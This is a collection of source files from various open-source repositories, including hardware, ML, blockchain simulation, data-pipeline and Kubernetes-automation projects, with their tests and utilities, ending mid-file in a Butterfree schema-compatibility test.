max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
litex/soc/cores/cpu/femtorv/__init__.py | osterwood/litex | 1,501 | 12715289 | <filename>litex/soc/cores/cpu/femtorv/__init__.py<gh_stars>1000+
from litex.soc.cores.cpu.femtorv.core import FemtoRV
|
device/ESP8266_NodeMcu_Slave/tools/mkfs.py | zhang49/All | 205 | 12715307 | #!/usr/bin/env python3
#
import sys
import struct
import math
import time
import argparse
import os
import subprocess
import zlib
import gzip
class MKFS:
def __init__(self, src, dest):
self._src = src
self._dest = dest
self._fileCount = 0
self.data=bytearray()
self.offset=0
def output_writeln(self,line):
self.file_dest.write(line+'\r\n')
def writeFile(self,path,filename,compress):
with open(path, "rb") as f:
fileBytes = f.read()
if compress:
gzip_compress = zlib.compressobj(9, zlib.DEFLATED, zlib.MAX_WBITS | 16)
gzip_data = gzip_compress.compress(fileBytes) + gzip_compress.flush()
fileBytes = gzip_data
fileLen = len(fileBytes)
fileBytes = bytearray(fileBytes)
self.output_writeln('\t\t{')
self.output_writeln('\t\t.size='+str(fileLen)+',')
self.output_writeln('\t\t.name = "'+filename+'",')
if compress:
self.output_writeln('\t\t.gzip=1,')
else:
self.output_writeln('\t\t.gzip=0,')
self.output_writeln('\t\t.offset='+str(self.offset))
#append data
for b in fileBytes:
self.data.append(b)
if self._innerCount == self._fileCount-1:
self.output_writeln('\t\t}')
else:
self.output_writeln('\t\t},')
self._innerCount+=1
self.offset+=fileLen;
#align
rest = 4-(self.offset)%4;
while rest > 0:
self.offset=self.offset+1
self.data.append(0);
rest=rest-1
def count(self):
for dirname, dirnames, filenames in os.walk(self._src):
# print path to all filenames.
for filename in filenames:
self._fileCount+=1
if '.bak' in dirnames:
dirnames.remove('.bak')
if '.git' in dirnames:
# don't go into any .git directories.
dirnames.remove('.git')
def run(self):
self.file_dest = open(self._dest,'w')
self.count()
self.output_writeln('//Generated by MKFS tool')
self.output_writeln('//')
self.output_writeln('#include "rofs.h"')
self.output_writeln('#include "c_types.h"')
self.output_writeln('#define ROFS_FILE_COUNT '+str(self._fileCount))
self.output_writeln('const RO_FS ro_file_system = {')
self.output_writeln('\t.count='+str(self._fileCount)+',')
self.output_writeln('\t.files={')
self._innerCount=0;
#make full path
for dirname, dirnames, filenames in os.walk(self._src):
# print path to all filenames.
for filename in filenames:
self.writeFile(os.path.join(dirname,filename),filename,1)
# Advanced usage:
# editing the 'dirnames' list will stop os.walk() from recursing into there.
if '.git' in dirnames:
# don't go into any .git directories.
dirnames.remove('.git')
if '.bak' in dirnames:
dirnames.remove('.bak')
self.output_writeln('\t}')
self.output_writeln('};')
fileHex = ', '.join(hex(x) for x in self.data)
self.output_writeln('const ICACHE_STORE_ATTR ICACHE_RODATA_ATTR uint8_t rofs_data[]={'+fileHex+'};')
#self.output_writeln('static ROFS_FILE_ENTRY ro_file_system_entries[]={'+','.join('file'+str(x) for x in range(0,self._fileCount-1))+'};')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'ROM FS make from dir', prog = 'mkfs')
parser.add_argument(
'--src', '-s',
help = 'Source directory')
parser.add_argument(
'--dest', '-d',
help = 'Destination file')
parser.add_argument(
'--gzip', '-z',
help = 'Destination file',
default=1)
args = parser.parse_args()
mkfs = MKFS(args.src,args.dest)
mkfs.run()
|
airbyte-integrations/bases/source-acceptance-test/unit_tests/test_asserts.py | OTRI-Unipd/OTRI-airbyte | 6,215 | 12715313 | <gh_stars>1000+
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import pytest
from airbyte_cdk.models import (
AirbyteRecordMessage,
AirbyteStream,
ConfiguredAirbyteCatalog,
ConfiguredAirbyteStream,
DestinationSyncMode,
SyncMode,
)
from source_acceptance_test.utils.asserts import verify_records_schema
@pytest.fixture(name="record_schema")
def record_schema_fixture():
return {
"properties": {
"text_or_null": {"type": ["null", "string"]},
"number_or_null": {"type": ["null", "number"]},
"text": {"type": ["string"]},
"number": {"type": ["number"]},
},
"type": ["null", "object"],
}
@pytest.fixture(name="configured_catalog")
def catalog_fixture(request, record_schema) -> ConfiguredAirbyteCatalog:
record_schema = request.param if hasattr(request, "param") else record_schema
stream = ConfiguredAirbyteStream(
stream=AirbyteStream(name="my_stream", json_schema=record_schema),
sync_mode=SyncMode.full_refresh,
destination_sync_mode=DestinationSyncMode.append,
)
return ConfiguredAirbyteCatalog(streams=[stream])
def test_verify_records_schema(configured_catalog: ConfiguredAirbyteCatalog):
"""Test that correct records returned as records with errors, and verify specific error messages"""
records = [
{
"text_or_null": 123, # wrong format
"number_or_null": 10.3,
"text": "text",
"number": "text", # wrong format
},
{
"text_or_null": "test",
"number_or_null": None,
"text": None, # wrong value
"number": None, # wrong value
},
{
"text_or_null": None,
"number_or_null": None,
"text": "text",
"number": 77,
},
{
"text_or_null": None,
"number_or_null": None,
"text": "text",
"number": "text", # wrong format
},
]
records = [AirbyteRecordMessage(stream="my_stream", data=record, emitted_at=0) for record in records]
streams_with_errors = verify_records_schema(records, configured_catalog)
errors = [error.message for error in streams_with_errors["my_stream"].values()]
assert "my_stream" in streams_with_errors
assert len(streams_with_errors) == 1, "only one stream"
assert len(streams_with_errors["my_stream"]) == 3, "only first error for each field"
assert errors == ["123 is not of type 'null', 'string'", "'text' is not of type 'number'", "None is not of type 'string'"]
@pytest.mark.parametrize(
"record, configured_catalog, valid",
[
# Send null data
({"a": None}, {"type": "object", "properties": {"a": {"type": "string", "format": "time"}}}, False),
# time
({"a": "sdf"}, {"type": "object", "properties": {"a": {"type": "string", "format": "time"}}}, False),
({"a": "12:00"}, {"type": "object", "properties": {"a": {"type": "string", "format": "time"}}}, False),
({"a": "12:00:90"}, {"type": "object", "properties": {"a": {"type": "string", "format": "time"}}}, False),
({"a": "12:00:22"}, {"type": "object", "properties": {"a": {"type": "string", "format": "time"}}}, True),
# date
({"a": "12:00:90"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date"}}}, False),
({"a": "2020-12-20"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date"}}}, True),
({"a": "2020-20-20"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date"}}}, False),
# date-time
# full date-time format with timezone only valid, according to https://datatracker.ietf.org/doc/html/rfc3339#section-5.6
({"a": "12:11:00"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, False),
({"a": "2018-11-13 20:20:39"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, True),
({"a": "2021-08-10T12:43:15"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, True),
({"a": "2021-08-10T12:43:15Z"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, True),
({"a": "2018-11-13T20:20:39+00:00"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, True),
({"a": "2018-21-13T20:20:39+00:00"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, False),
# This is valid for postgres sql but not valid for bigquery
({"a": "2014-09-27 9:35z"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, False),
# Seconds are obligatory for bigquery timestamp
({"a": "2014-09-27 9:35"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, False),
({"a": "2014-09-27 9:35:0z"}, {"type": "object", "properties": {"a": {"type": "string", "format": "date-time"}}}, True),
# email
({"a": "2018-11-13 20:20:39"}, {"type": "object", "properties": {"a": {"type": "string", "format": "email"}}}, False),
({"a": "<EMAIL>"}, {"type": "object", "properties": {"a": {"type": "string", "format": "email"}}}, True),
({"a": "<EMAIL>"}, {"type": "object", "properties": {"a": {"type": "string", "format": "email"}}}, True),
({"a": "写电子邮件@子邮件"}, {"type": "object", "properties": {"a": {"type": "string", "format": "email"}}}, True),
# hostname
({"a": "2018-11-13 20:20:39"}, {"type": "object", "properties": {"a": {"type": "string", "format": "hostname"}}}, False),
({"a": "<EMAIL>"}, {"type": "object", "properties": {"a": {"type": "string", "format": "hostname"}}}, False),
({"a": "localhost"}, {"type": "object", "properties": {"a": {"type": "string", "format": "hostname"}}}, True),
({"a": "example.com"}, {"type": "object", "properties": {"a": {"type": "string", "format": "hostname"}}}, True),
# ipv4
({"a": "example.com"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv4"}}}, False),
({"a": "0.0.0.1000"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv4"}}}, False),
({"a": "0.0.0.0"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv4"}}}, True),
# ipv6
({"a": "example.com"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv6"}}}, False),
({"a": "fc00:db20:35b:7399::5"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv6"}}}, True),
({"a": "::1"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv6"}}}, True),
({"a": "::"}, {"type": "object", "properties": {"a": {"type": "string", "format": "ipv6"}}}, True),
],
indirect=["configured_catalog"],
)
def test_validate_records_format(record, configured_catalog, valid):
records = [AirbyteRecordMessage(stream="my_stream", data=record, emitted_at=0)]
streams_with_errors = verify_records_schema(records, configured_catalog)
if valid:
assert not streams_with_errors
else:
assert streams_with_errors, f"Record {record} should produce errors against {configured_catalog.streams[0].stream.json_schema}"
|
validation_tests/analytical_exact/runup_on_beach/produce_results.py | samcom12/anuga_core | 136 | 12715320 | <gh_stars>100-1000
import anuga
from anuga.validation_utilities import produce_report
args = anuga.get_args()
produce_report('numerical_runup.py', args=args)
|
tests/unit/tensorflow/modules/test_sequential.py | chiragnagpal/probflow | 134 | 12715330 | import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from probflow.modules import Dense, Sequential
from probflow.parameters import Parameter
from probflow.utils.settings import Sampling
tfd = tfp.distributions
def is_close(a, b, tol=1e-3):
return np.abs(a - b) < tol
def test_Sequential():
"""Tests probflow.modules.Sequential"""
# Create the module
seq = Sequential(
[Dense(5, 10), tf.nn.relu, Dense(10, 3), tf.nn.relu, Dense(3, 1)]
)
# Steps should be list
assert isinstance(seq.steps, list)
assert len(seq.steps) == 5
# Test MAP outputs are the same
x = tf.random.normal([4, 5])
samples1 = seq(x)
samples2 = seq(x)
assert np.all(samples1.numpy() == samples2.numpy())
assert samples1.ndim == 2
assert samples1.shape[0] == 4
assert samples1.shape[1] == 1
# Test samples are different
with Sampling(n=1):
samples1 = seq(x)
samples2 = seq(x)
assert np.all(samples1.numpy() != samples2.numpy())
assert samples1.ndim == 2
assert samples1.shape[0] == 4
assert samples1.shape[1] == 1
# parameters should return list of all parameters
param_list = seq.parameters
assert isinstance(param_list, list)
assert len(param_list) == 6
assert all(isinstance(p, Parameter) for p in param_list)
param_names = [p.name for p in seq.parameters]
assert "Dense_weights" in param_names
assert "Dense_bias" in param_names
param_shapes = [p.shape for p in seq.parameters]
assert [5, 10] in param_shapes
assert [1, 10] in param_shapes
assert [10, 3] in param_shapes
assert [1, 3] in param_shapes
assert [3, 1] in param_shapes
assert [1, 1] in param_shapes
# kl_loss should return sum of KL losses
kl_loss = seq.kl_loss()
assert isinstance(kl_loss, tf.Tensor)
assert kl_loss.ndim == 0
|
src/robusta/integrations/receiver.py | robusta-dev/robusta | 273 | 12715356 | <filename>src/robusta/integrations/receiver.py
import base64
import hashlib
import hmac
import logging
import time
from typing import Optional, Dict, Any
from uuid import UUID
import websocket
import json
import os
from threading import Thread
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey
from ..core.playbooks.playbook_utils import to_safe_str
from ..core.playbooks.playbooks_event_handler import PlaybooksEventHandler
from ..core.model.env_vars import INCOMING_REQUEST_TIME_WINDOW_SECONDS, RUNNER_VERSION
from ..core.reporting.action_requests import (
ExternalActionRequest,
ActionRequestBody,
sign_action_request, PartialAuth,
)
from ..utils.auth_provider import AuthProvider
WEBSOCKET_RELAY_ADDRESS = os.environ.get(
"WEBSOCKET_RELAY_ADDRESS", "wss://relay.robusta.dev"
)
CLOUD_ROUTING = json.loads(os.environ.get("CLOUD_ROUTING", "True").lower())
RECEIVER_ENABLE_WEBSOCKET_TRACING = json.loads(
os.environ.get("RECEIVER_ENABLE_WEBSOCKET_TRACING", "False").lower()
)
INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC = int(
os.environ.get("INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC", 3)
)
class ActionRequestReceiver:
def __init__(self, event_handler: PlaybooksEventHandler):
self.event_handler = event_handler
self.active = True
self.account_id = self.event_handler.get_global_config().get("account_id")
self.cluster_name = self.event_handler.get_global_config().get("cluster_name")
self.auth_provider = AuthProvider()
self.ws = websocket.WebSocketApp(
WEBSOCKET_RELAY_ADDRESS,
on_open=self.on_open,
on_message=self.on_message,
on_error=self.on_error,
)
if not self.account_id or not self.cluster_name:
logging.error(
f"Action receiver cannot start. "
f"Missing required account_id {self.account_id} cluster_name {self.cluster_name}"
)
return
self.start_receiver()
def start_receiver(self):
if not CLOUD_ROUTING:
logging.info(
"outgoing messages only mode. Incoming event receiver not initialized"
)
return
if WEBSOCKET_RELAY_ADDRESS == "":
logging.warning("relay address empty. Not initializing relay")
return
websocket.enableTrace(RECEIVER_ENABLE_WEBSOCKET_TRACING)
receiver_thread = Thread(target=self.run_forever)
receiver_thread.start()
def run_forever(self):
logging.info("starting relay receiver")
while self.active:
self.ws.run_forever()
logging.info("relay websocket closed")
time.sleep(INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC)
def stop(self):
logging.info(f"Stopping incoming receiver")
self.active = False
self.ws.close()
@classmethod
def __sync_response(cls, status_code: int, request_id: str, data) -> Dict:
return {
"action": "response",
"request_id": request_id,
"status_code": status_code,
"data": data
}
def __exec_external_request(
self, action_request: ExternalActionRequest, validate_timestamp: bool
):
logging.info(f"Callback `{action_request.body.action_name}` {to_safe_str(action_request.body.action_params)}")
sync_response = action_request.request_id != "" # if request_id is set, we need to write back the response
if not self.__validate_request(action_request, validate_timestamp):
req_json = action_request.json(exclude={"body"})
body_json = action_request.body.json(exclude={"action_params"}) # action params already printed above
logging.error(f"Failed to validate action request {req_json} {body_json}")
if sync_response:
self.ws.send(data=json.dumps(self.__sync_response(401, action_request.request_id, "")))
return
response = self.event_handler.run_external_action(
action_request.body.action_name,
action_request.body.action_params,
action_request.body.sinks,
sync_response,
action_request.no_sinks,
)
if sync_response:
http_code = 200 if response.get("success") else 500
self.ws.send(data=json.dumps(self.__sync_response(http_code, action_request.request_id, response)))
def on_message(self, ws, message):
# TODO: use typed pydantic classes here?
incoming_event = json.loads(message)
actions = incoming_event.get("actions", None)
if actions: # this is slack callback format
# slack callbacks have a list of 'actions'. Within each action there a 'value' field,
# which container the actual action details we need to run.
# This wrapper format is part of the slack API, and cannot be changed by us.
for action in actions:
raw_action = action.get("value", None)
try:
self.__exec_external_request(
ExternalActionRequest.parse_raw(raw_action), False
)
except Exception:
logging.error(
f"Failed to run incoming event {ActionRequestReceiver._stringify_incoming_event(raw_action)}",
exc_info=True
)
else: # assume it's ActionRequest format
try:
self.__exec_external_request(
ExternalActionRequest(**incoming_event), True
)
except Exception:
logging.error(
f"Failed to run incoming event {ActionRequestReceiver._stringify_incoming_event(incoming_event)}",
exc_info=True
)
@staticmethod
def _stringify_incoming_event(incoming_event) -> str:
"""Stringify incoming request masking action params in case it contains secrets"""
if isinstance(incoming_event, str): # slack format, stringified json
try:
event_dict = json.loads(incoming_event)
except Exception:
logging.error("Failed to parse raw incoming event", exc_info=True)
return "parse error"
elif isinstance(incoming_event, dict):
event_dict = incoming_event
else:
return f"Unknown incoming_event type {type(incoming_event)}"
body = event_dict.pop("body", {})
action_params = body.pop("action_params", {})
return f"{event_dict} {body} {to_safe_str(action_params)}"
def on_error(self, ws, error):
logging.info(f"Relay websocket error: {error}")
def on_open(self, ws):
account_id = self.event_handler.get_global_config().get("account_id")
cluster_name = self.event_handler.get_global_config().get("cluster_name")
open_payload = {
"action": "auth",
"account_id": account_id,
"cluster_name": cluster_name,
"version": RUNNER_VERSION,
}
logging.info(
f"connecting to server as account_id={account_id}; cluster_name={cluster_name}"
)
ws.send(json.dumps(open_payload))
def __validate_request(self, action_request: ExternalActionRequest, validate_timestamp: bool) -> bool:
"""
Two auth protocols are supported:
1. signature - Signing the body using the signing_key should match the signature
2. partial keys auth - using partial_auth_a and partial_auth_b
Each partial auth should be decrypted using the private key (rsa private key).
The content should have 2 items:
- key
- body hash
The operation key_a XOR key_b should be equal to the signing_key
If both protocols are present, we only check the signature
"""
if validate_timestamp and (
time.time() - action_request.body.timestamp
> INCOMING_REQUEST_TIME_WINDOW_SECONDS
):
logging.error(
f"Rejecting incoming request because it's too old. Cannot verify request {action_request}"
)
return False
signing_key = self.event_handler.get_global_config().get("signing_key")
body = action_request.body
if not signing_key:
logging.error(f"Signing key not available. Cannot verify request {body}")
return False
# First auth protocol option, based on signature only
signature = action_request.signature
if signature:
generated_signature = sign_action_request(body, signing_key)
return hmac.compare_digest(generated_signature, signature)
# Second auth protocol option, based on public key
partial_auth_a = action_request.partial_auth_a
partial_auth_b = action_request.partial_auth_b
if not partial_auth_a or not partial_auth_b:
logging.error(f"Insufficient authentication data. Cannot verify request {body}")
return False
private_key = self.auth_provider.get_private_rsa_key()
if not private_key:
logging.error(f"Private RSA key missing. Cannot validate request for {body}")
return False
a_valid, key_a = self.__extract_key_and_validate(partial_auth_a, private_key, body)
b_valid, key_b = self.__extract_key_and_validate(partial_auth_b, private_key, body)
if not a_valid or not b_valid:
logging.error(f"Cloud not validate partial auth for {body}")
return False
try:
signing_key_uuid = UUID(signing_key)
except Exception:
logging.error(f"Wrong signing key format. Cannot validate parital auth for {body}")
return False
if (key_a.int ^ key_b.int) != signing_key_uuid.int:
logging.error(f"Partial auth keys combination mismatch for {body}")
return False
return True
@classmethod
def __extract_key_and_validate(
cls,
encrypted: str,
private_key: RSAPrivateKey,
body: ActionRequestBody
) -> (bool, Optional[UUID]):
try:
plain = private_key.decrypt(
base64.b64decode(encrypted.encode("utf-8")),
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
auth = PartialAuth(**json.loads(plain.decode("utf-8")))
body_string = body.json(exclude_none=True, sort_keys=True, separators=(',', ':')).encode("utf-8")
body_hash = f"v0={hashlib.sha256(body_string).hexdigest()}"
return hmac.compare_digest(body_hash, auth.hash), auth.key
except Exception:
logging.error("Error validating partial auth data", exc_info=True)
return False, None
|
addons/s3/tests/utils.py | gaybro8777/osf.io | 628 | 12715395 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from addons.base.tests.base import OAuthAddonTestCaseMixin, AddonTestCase
from addons.s3.tests.factories import S3AccountFactory
from addons.s3.provider import S3Provider
from addons.s3.serializer import S3Serializer
class S3AddonTestCase(OAuthAddonTestCaseMixin, AddonTestCase):
ADDON_SHORT_NAME = 's3'
ExternalAccountFactory = S3AccountFactory
Provider = S3Provider
Serializer = S3Serializer
client = None
folder = {
'path': 'bucket',
'name': 'bucket',
'id': 'bucket'
}
|
admin/preprints/forms.py | gaybro8777/osf.io | 628 | 12715396 | from django import forms
from osf.models import Preprint
class ChangeProviderForm(forms.ModelForm):
class Meta:
model = Preprint
fields = ('provider',)
|
corehq/apps/hqadmin/tests/test_corrupt_couch.py | dimagilg/commcare-hq | 471 | 12715437 | from testil import eq
from ..corrupt_couch import find_missing_ids
def test_find_missing_ids():
def test(result_sets, expected_missing, expected_tries, min_tries=5):
def get_ids():
while len(results) > 1:
return results.pop()
return results[0]
results = list(reversed(result_sets))
missing, tries = find_missing_ids(get_ids, min_tries)
eq(missing, expected_missing)
eq(tries, expected_tries)
yield test, [{1, 2}], set(), 5
yield test, [{1, 2}], set(), 6, 6
yield test, [{1, 2}], set(), 10, 10
yield test, [{1, 2}, {1, 3}, {2, 3}], {1, 2, 3}, 7
yield test, [{1, 2}, {1, 3}, {1, 3}, {1, 3}, {1, 3}, {2, 3}], {1, 2, 3}, 10
yield test, [{1, 2}] + [{1, 3}] * 5 + [{2, 4}], {2, 3}, 6
yield test, [{1, 2}] + [{1, 3}] * 10 + [{2, 4}], {2, 3}, 11, 10
|
onir/bin/eval.py | tgeral68/OpenNIR | 140 | 12715457 | <filename>onir/bin/eval.py
import os
os.environ['ONIR_IGNORE_ARGV'] = 'true'
import json
import argparse
from onir import metrics
def main():
parser = argparse.ArgumentParser()
parser.add_argument('qrels')
parser.add_argument('run')
parser.add_argument('--each_topic', '-q', action='store_true')
parser.add_argument('--nosummary', '-n', action='store_true')
parser.add_argument('--json_output', '-j', action='store_true')
parser.add_argument('--verbose', '-v', action='store_true')
parser.add_argument('metrics', nargs='+')
args = parser.parse_args()
result = metrics.calc(args.qrels, args.run, args.metrics, verbose=args.verbose)
if args.json_output:
print(json.dumps(result))
elif result:
if args.each_topic:
for qid in result[args.metrics[0]]:
for metric in args.metrics:
print(f'{metric}\t{qid}\t{result[metric][qid]:.4f}')
if not args.nosummary:
for metric, mean in metrics.mean(result).items():
print(f'{metric}\tall\t{mean:.4f}')
if __name__ == '__main__':
main()
|
forge/ethyr/torch/optim.py | wwxFromTju/neural-mmo | 1,450 | 12715469 | <filename>forge/ethyr/torch/optim.py
import numpy as np
import torch
from torch import optim
from torch.autograd import Variable
from pdb import set_trace as T
from forge.ethyr import rollouts
from forge.ethyr.torch import loss
from forge.ethyr.torch import param
class ManualAdam(optim.Adam):
def step(self, grads):
grads = Variable(torch.Tensor(np.array(grads)))
self.param_groups[0]['params'][0].grad = grads
super().step()
class ManualSGD(optim.SGD):
def step(self, grads):
grads = Variable(torch.Tensor(np.array(grads)))
self.param_groups[0]['params'][0].grad = grads
super().step()
def backward(rolls, anns, valWeight=0.5, entWeight=0):
atns, vals, rets = rollouts.mergeRollouts(rolls.values())
returns = torch.tensor(rets).view(-1, 1).float()
vals = torch.cat(vals)
pg, entropy, attackentropy = 0, 0, 0
for i, atnList in enumerate(atns):
aArg, aArgIdx = list(zip(*atnList))
aArgIdx = torch.stack(aArgIdx)
l, e = loss.PG(aArg, aArgIdx, vals, returns)
pg += l
entropy += e
valLoss = loss.valueLoss(vals, returns)
totLoss = pg + valWeight*valLoss + entWeight*entropy
totLoss.backward()
grads = [param.getGrads(ann) for ann in anns]
reward = np.mean(rets)
return reward, vals.mean(), grads, pg, valLoss, entropy
|
quarkchain/experimental/pbft.py | QuarkChain/pyquarkchain | 237 | 12715481 | <gh_stars>100-1000
import asyncio
import hashlib
from event_driven_simulator import Connection
RPC_TIMEOUT_MS = 100
class ClientRequest:
def __init__(self, data):
self.data = data
def digest(self):
m = hashlib.sha256()
m.update(self.data)
return m.digest()
class PrePrepareMsg:
def __init__(self, view, seq_num, digest, m, sig):
self.view = view
# Seq number
self.seq_num = seq_num
# Client request digest
self.digest = digest
# Client request (can be carried by different transport)
self.m = m
# Siganture
self.sig = sig
class PrepareMsg:
def __init__(self, view, seq_num, digest, node_id, sig):
# View
self.view = view
# Seq number
self.seq_num = seq_num
# Digest
self.digest = digest
# Node id (may not needed as node_id can be identified from sig)
self.node_id = node_id
self.sig = sig
class CommitMsg:
def __init__(self, view, seq_num, digest, node_id, sig):
self.view = view
self.seq_num = seq_num
self.digest = digest
self.node_id = node_id
self.sig = sig
class CheckpointMsg:
def __init__(self, seq_num, state_digest, sign):
self.seq_num = seq_num
self.state_digest = state_digest
self.sign = sign
class Node:
def __init__(self, node_id, view, is_primary=False):
self.node_id = node_id
self.is_primary = is_primary
# TODO
self.primary_node_id = 0
self.view = view
self.connection_list = []
self.isCrashing = False
self.state = b""
# TODO
self.h = 0
self.H = 10000
self.seq_num = 0
# Received messages. all should be persisted
# Could be removed after checkpoint
self.pre_prepare_msg_map = dict()
self.prepare_msg_map = dict()
self.commit_msg_map = dict()
self.committed_set = set()
def addConnection(self, conn):
self.connection_list.append(conn)
def __get_seq_num(self):
# TODO: H check
self.seq_num += 1
return self.seq_num
async def start(self):
while True:
await asyncio.sleep(1)
def sendClientRequest(self, m):
if not self.is_primary:
return None
msg = PrePrepareMsg(
self.view, self.__get_seq_num(), m.digest(), m, self.node_id
)
self.pre_prepare_msg_map[msg.seq_num] = msg
print(
"Node {}: sending pre-prepare msg, seq no {}, digest {}".format(
self.node_id, msg.seq_num, msg.digest.hex()
)
)
for conn in self.connection_list:
asyncio.ensure_future(conn.sendPrePrepareMsgAsync(msg))
# RPC handling
def handlePrePrepareMsg(self, msg):
if self.view != msg.view:
return
if self.primary_node_id != msg.sig:
return
if msg.seq_num < self.h or msg.seq_num > self.H:
return
if msg.seq_num in self.pre_prepare_msg_map:
return
print(
"Node {}: processing pre-prepare msg, seq no {}, digest {}".format(
self.node_id, msg.seq_num, msg.digest.hex()
)
)
self.pre_prepare_msg_map[msg.seq_num] = msg
self.prepare_msg_map.setdefault(msg.seq_num, set()).add(self.node_id)
prepare_msg = PrepareMsg(
msg.view, msg.seq_num, msg.digest, self.node_id, self.node_id
)
for conn in self.connection_list:
asyncio.ensure_future(conn.sendPrepareMsgAsync(prepare_msg))
def __num_2f(self):
f = (len(self.connection_list) + 1 - 1) // 3
return 2 * f
def __is_prepared(self, seq_num):
return len(self.prepare_msg_map.get(seq_num, set())) >= self.__num_2f()
def handlePrepareMsg(self, msg):
if self.view != msg.view:
return
# TODO: May cache the prepare message until pre_prepare is received.
if msg.seq_num not in self.pre_prepare_msg_map:
return
pre_prepare_msg = self.pre_prepare_msg_map[msg.seq_num]
if pre_prepare_msg.digest != msg.digest:
return
print(
"Node {}: processing prepare msg from {}, seq no {}, digest {}".format(
self.node_id, msg.node_id, msg.seq_num, msg.digest.hex()
)
)
is_prepared_before = self.__is_prepared(msg.seq_num)
self.prepare_msg_map.setdefault(msg.seq_num, set()).add(msg.node_id)
if not is_prepared_before and self.__is_prepared(msg.seq_num):
# Broadcast commit
self.commit_msg_map.setdefault(msg.seq_num, set()).add(self.node_id)
commit_msg = CommitMsg(
msg.view, msg.seq_num, msg.digest, self.node_id, self.node_id
)
print(
"Node {}: sending commit msg, seq no {}, digest {}".format(
self.node_id, msg.seq_num, msg.digest.hex()
)
)
for conn in self.connection_list:
asyncio.ensure_future(conn.sendCommitMsgAsync(commit_msg))
def handleCommitMsg(self, msg):
if self.view != msg.view:
return
if msg.seq_num not in self.pre_prepare_msg_map:
return
pre_prepare_msg = self.pre_prepare_msg_map[msg.seq_num]
if pre_prepare_msg.digest != msg.digest:
return
print(
"Node {}: processing commit msg from {}, seq no {}, digest {}".format(
self.node_id, msg.node_id, msg.seq_num, msg.digest.hex()
)
)
self.commit_msg_map.setdefault(msg.seq_num, set()).add(msg.node_id)
if (
len(self.commit_msg_map[msg.seq_num]) >= self.__num_2f() + 1
and msg.seq_num not in self.committed_set
):
# TODO: Check the requests with lower sequences are executed (finalized)
# Message is irreversible/finalized.
# May discard all logs of the message,
# but current view-change protocol needs prepare messages.
# May replace with the digest as key
self.committed_set.add(msg.seq_num)
# Simple state execution
s = hashlib.sha256()
s.update(self.state)
s.update(pre_prepare_msg.m.digest())
self.state = s.digest()
print(
"Node {}: msg with digest {} commited, state {}".format(
self.node_id, msg.digest.hex(), self.state.hex()
)
)
checkpoint_msg = CheckpointMsg(msg.seq_num, self.state, self.node_id)
for conn in self.connection_list:
asyncio.ensure_future(conn.sendCheckpointMsgAsync(checkpoint_msg))
def handleCheckpointMsg(self, msg):
pass
class PbftConnection(Connection):
def __init__(
self,
source,
destination,
timeoutMs=RPC_TIMEOUT_MS,
networkDelayGenerator=lambda: 0,
):
super().__init__(source, destination, timeoutMs, networkDelayGenerator)
async def sendPrePrepareMsgAsync(self, request):
return await self.callWithDelayOrTimeout(
lambda: self.destination.handlePrePrepareMsg(request)
)
async def sendPrepareMsgAsync(self, request):
return await self.callWithDelayOrTimeout(
lambda: self.destination.handlePrepareMsg(request)
)
async def sendCommitMsgAsync(self, request):
return await self.callWithDelayOrTimeout(
lambda: self.destination.handleCommitMsg(request)
)
async def sendCheckpointMsgAsync(self, request):
return await self.callWithDelayOrTimeout(
lambda: self.destination.handleCheckpointMsg(request)
)
N = 4
nodeList = [Node(i, view=0, is_primary=i == 0) for i in range(N)]
connectionMap = {}
for i in range(N):
for j in range(N):
if i == j:
continue
source = nodeList[i]
dest = nodeList[j]
source.addConnection(PbftConnection(source, dest))
for i in range(N):
asyncio.get_event_loop().create_task(nodeList[i].start())
# nodeList[-1].isCrashing = True
# nodeList[-2].isCrashing = True
nodeList[0].sendClientRequest(ClientRequest(b""))
try:
asyncio.get_event_loop().run_forever()
except Exception as e:
print(e)
|
tests/unit/butterfree/hooks/schema_compatibility/test_cassandra_table_schema_compatibility_hook.py | fossabot/butterfree | 208 | 12715514 | from unittest.mock import MagicMock
import pytest
from butterfree.clients import CassandraClient
from butterfree.hooks.schema_compatibility import CassandraTableSchemaCompatibilityHook
class TestCassandraTableSchemaCompatibilityHook:
def test_run_compatible_schema(self, spark_session):
cassandra_client = CassandraClient(host=["mock"], keyspace="dummy_keyspace")
cassandra_client.sql = MagicMock( # type: ignore
return_value=[
{"column_name": "feature1", "type": "text"},
{"column_name": "feature2", "type": "int"},
]
)
table = "table"
input_dataframe = spark_session.sql("select 'abc' as feature1, 1 as feature2")
hook = CassandraTableSchemaCompatibilityHook(cassandra_client, table)
# act and assert
assert hook.run(input_dataframe) == input_dataframe
def test_run_incompatible_schema(self, spark_session):
cassandra_client = CassandraClient(host=["mock"], keyspace="dummy_keyspace")
cassandra_client.sql = MagicMock( # type: ignore
return_value=[
{"column_name": "feature1", "type": "text"},
{"column_name": "feature2", "type": "bigint"},
]
